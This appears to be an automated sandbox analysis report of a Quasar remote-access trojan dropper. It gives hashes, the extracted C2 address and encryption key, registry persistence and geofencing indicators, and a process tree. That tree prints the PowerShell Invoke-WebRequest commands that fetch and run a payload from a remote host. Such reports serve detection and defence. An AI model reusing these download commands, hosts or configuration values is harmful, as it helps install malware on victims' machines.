Analysis

max time kernel: 93s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20240729-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240729-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30-07-2024 01:19

Static task: static1
Behavioral task: behavioral1
Sample: jdconstructnOrderfdp..exe
Resource: win7-20240704-en
General

Target: jdconstructnOrderfdp..exe
Size: 288KB
MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config

Extracted
Family: quasar
Version: 1.4.1
Office04
C2: 192.228.105.2:4782
4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
encryption_key: 0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
install_name: jorder.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: svchost
subdirectory: SubDir
Signatures

Quasar payload 2 IoCs
Processes:
resource: behavioral2/memory/2308-40-0x0000000005390000-0x00000000056B5000-memory.dmp
yara_rule: family_quasar

resource: behavioral2/memory/2308-41-0x0000000005E10000-0x0000000006134000-memory.dmp
yara_rule: family_quasar

Blocklisted process makes network request 2 IoCs
Processes: powershell.exe, powershell.exe
flow  pid   process
4     3960  powershell.exe
12    4356  powershell.exe

Processes: powershell.exe, powershell.exe
pid   process
3960  powershell.exe
4356  powershell.exe

Downloads MZ/PE file
.NET Reactor protector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource: C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe
yara_rule: net_reactor

resource: behavioral2/memory/2308-33-0x00000000000C0000-0x000000000012E000-memory.dmp
yara_rule: net_reactor
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: jdconstructnOrderfdp..exe
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-735441492-2964205366-2526932795-1000\Control Panel\International\Geo\Nation
process: jdconstructnOrderfdp..exe

Executes dropped EXE 1 IoCs
Processes: networkrunfdp.exe
pid   process
2308  networkrunfdp.exe

Adds Run key to start application 2 TTPs 1 IoCs
Processes: networkrunfdp.exe
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-735441492-2964205366-2526932795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe"
process: networkrunfdp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: jdconstructnOrderfdp..exe, networkrunfdp.exe
description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
process: jdconstructnOrderfdp..exe

description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
process: networkrunfdp.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes: powershell.exe, powershell.exe
pid   process
3960  powershell.exe
3960  powershell.exe
4356  powershell.exe
4356  powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes: powershell.exe, powershell.exe, networkrunfdp.exe
description              pid   process
Token: SeDebugPrivilege  3960  powershell.exe
Token: SeDebugPrivilege  4356  powershell.exe
Token: SeDebugPrivilege  2308  networkrunfdp.exe

Suspicious use of FindShellTrayWindow 2 IoCs
Processes: networkrunfdp.exe
pid   process
2308  networkrunfdp.exe
2308  networkrunfdp.exe

Suspicious use of SendNotifyMessage 2 IoCs
Processes: networkrunfdp.exe
pid   process
2308  networkrunfdp.exe
2308  networkrunfdp.exe

Suspicious use of WriteProcessMemory 9 IoCs
Processes: jdconstructnOrderfdp..exe, cmd.exe
description                       pid   process                    target process
PID 4480 wrote to memory of 2364  4480  jdconstructnOrderfdp..exe  cmd.exe
PID 4480 wrote to memory of 2364  4480  jdconstructnOrderfdp..exe  cmd.exe
PID 2364 wrote to memory of 3960  2364  cmd.exe                    powershell.exe
PID 2364 wrote to memory of 3960  2364  cmd.exe                    powershell.exe
PID 2364 wrote to memory of 4356  2364  cmd.exe                    powershell.exe
PID 2364 wrote to memory of 4356  2364  cmd.exe                    powershell.exe
PID 2364 wrote to memory of 2308  2364  cmd.exe                    networkrunfdp.exe
PID 2364 wrote to memory of 2308  2364  cmd.exe                    networkrunfdp.exe
PID 2364 wrote to memory of 2308  2364  cmd.exe                    networkrunfdp.exe
Processes

C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe
"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 4480

    C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71D4.tmp\71E5.tmp\71E6.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    - Suspicious use of WriteProcessMemory
    PID: 2364

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3960

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4356

        C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe
        networkrunfdp.exe
        - Executes dropped EXE
        - Adds Run key to start application
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        PID: 2308
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 1KB
MD5: a2b24af1492f112d2e53cb7415fda39f
SHA1: dbfcee57242a14b60997bd03379cc60198976d85
SHA256: fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA512: 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Filesize: 334B
MD5: 9aaac0122442ca0ebb4d8bb795e86676
SHA1: 594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA256: 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512: d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 417KB
MD5: a18b7de2990becc30f700720e19ebfef
SHA1: b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA256: 2bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512: 484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b